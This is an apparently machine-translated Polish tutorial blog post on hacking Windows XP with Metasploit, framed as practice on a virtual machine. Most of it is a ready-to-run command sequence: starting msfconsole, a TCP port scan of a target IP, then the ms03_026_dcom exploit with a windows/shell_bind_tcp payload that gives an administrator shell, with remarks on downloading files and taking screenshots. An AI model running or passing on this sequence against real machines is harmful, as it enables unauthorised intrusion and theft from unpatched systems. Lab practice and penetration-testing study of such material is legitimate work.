Jak włamać Windows XP

Jak włamać Windows XP-Windows XP to stary system operacyjny. W rzeczywistości Microsoft przestał wydawać aktualizacje dla tego systemu operacyjnego. Jednak wiele osób nadal używa XP na swoich komputerach. Ponieważ ten system operacyjny nie otrzyma żadnych przyszłych aktualizacji, jego istniejące luki będą zawsze dostępne dla hakerów i testerów penetracyjnych.

Ta sekcja nauczy Cię, jak atakować Windows XP za pomocą frameworka Metasploit. Autor zakłada, że używasz Kali Linux i że masz maszynę wirtualną z systemem Windows XP. Maszyny wirtualne umożliwiają uruchamianie wielu systemów operacyjnych (w tym przypadku Kali Linux i Windows XP) na jednym komputerze. Istnieje wiele materiałów instruktażowych dotyczących maszyn wirtualnych na YouTube.

upewnij się, że używasz maszyny wirtualnej. Ćwiczenie tej techniki hakerskiej na prawdziwym komputerze z systemem Windows XP może prowadzić do poważnych problemów. Jeśli coś złego stanie się na maszynie wirtualnej, możesz po prostu uruchomić ją ponownie, naciskając kilka przycisków. Z drugiej strony, zniszczenie rzeczywistego komputera XP może prowadzić do kosztów naprawy.

Jak włamać się do systemu Windows XP

musisz włamać się do sieci przed zhakowaniem komputerów z nią powiązanych. Jednak ta lekcja nie wymaga żadnego ataku sieciowego. To dlatego, że system operacyjny XP jest zainstalowany w komputerze Kali. Tak więc maszyna wirtualna XP należy do twojej sieci komputerowej.

aby zhakować komputer z systemem Windows XP, należy:

  • Uruchom Framework Metasploit w systemie Kali Linux OS.

Uruchom terminal i wpisz:

service postgresql start

to polecenie aktywuje PostgreSQL na twoim komputerze. PostgreSQL służy jako baza danych Metasploita, więc powinieneś go najpierw uruchomić przed uruchomieniem samego programu. Teraz wpisz:

service metasploit start

lub

msfconsole

jeśli wszystko zrobiłeś dobrze, twój terminal powinien wyglądać tak:

  • Użyj funkcji” port scan ” w Metasploit, aby znaleźć cele.

framework Metasploit zawiera różne narzędzia pomocnicze. Skanowanie portów jest jednym z najlepszych narzędzi obecnych w tym frameworku. To narzędzie umożliwia skanowanie wszystkich portów maszyny. Może dostarczyć szczegółowych informacji na temat otwartych portów celu. Jak wiecie, port służy jako brama dla hakerów. Otwarty port to otwarte drzwi.

Aktywuj skanowanie portów wpisując to polecenie:

use auxiliary/scanner/portscan/tcp

Wyświetl dostępne opcje skanowania, wpisując:

show options

domyślnie skanowanie portów sprawdzi każdy port obecny w systemie. Nie chcesz, aby tak się stało, ponieważ cały proces zajmie dużo czasu. Najlepiej będzie, jeśli określisz zakres portów, które mają być sprawdzane. Oto przykład:

set ports 1-600

teraz musisz podać adres IP celu. Ten krok jest trudny, ponieważ adresy IP mogą się różnić. W tym przykładzie musisz uzyskać dostęp do maszyny wirtualnej XP i uruchomić wiersz polecenia. Wpisz „ipconfig” i wyszukaj adres IP maszyny. Załóżmy, że adres IP Twojej maszyny wirtualnej to 192.168.62.122.

wróć do systemu Kali OS i wprowadź następujący:

set RHOSTS 192.168.62.122

wpisz „Uruchom”, aby rozpocząć proces. Metasploit wyświetli wszystkie otwarte porty obecne w Twojej maszynie wirtualnej. Jeśli skanowanie nie wykazało żadnych otwartych portów, wróć do systemu operacyjnego XP i wyłącz zaporę sieciową. Następnie uruchom skanowanie ponownie. Załóżmy, że skaner odkrył dwa otwarte porty: 135 i 445.

w praktyce nie będziesz znać adresu IP swojego celu. Oznacza to, że musisz użyć NMAP, aby znaleźć cele i ich adresy IP.

  • Szukaj exploitów.

jest to jedna z najważniejszych faz ataku. Musisz znaleźć exploit, który działa na wybranym celu. Wyjdź ze skanera portów, wpisując „wstecz”. Na głównym ekranie msfconsole wpisz „search DCOM”. Exploit „dcom” jest jednym z najlepszych narzędzi, które można wykorzystać do hakowania komputera XP.

Metasploit pokaże Ci wyniki wyszukiwania. Poszukaj modułu o nazwie „exploit/windows/dcerpc / ms03_026_dcom” i skopiuj jego nazwę. Następnie wpisz następujący:

use exploit/windows/dcerpc/ms03_026_dcom

Wyświetl dostępne opcje wpisując:

show options

podaj adres IP celu. Oto kod:

set RHOST 192.168.62.122

wybierz ładunek do ataku. Ładunek określa, co się stanie po przekroczeniu obrony celu. Może ustawić otwarty terminal lub podłożyć wirusa. W Metasploit framework dostępne są tysiące ładunków. Aby znaleźć odpowiedni ładunek dla aktualnego ataku, wpisz:

payloads
  • idealny ładunek dla tej lekcji to „windows / shell_bind_tcp”. Ten ładunek otwiera powłokę (lub wiersz polecenia) w celu przez port TCP. Możesz ustawić ten ładunek wpisując:
set PAYLOAD windows/shell_bind_tcp
  • teraz, gdy określiłeś każdy aspekt ataku, wpisz „Uruchom”.

Metasploit powie Ci, że powłoka została otwarta w komputerze docelowym. Ta powłoka daje Ci uprawnienia administratora nad Twoim celem. Możesz pobierać pliki z tego komputera lub wysyłać do niego programy. Możesz również uzyskać zrzuty ekranu komputera, jeśli chcesz.

How To Hack Windows Xp Getastra Method

Leave a Reply

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.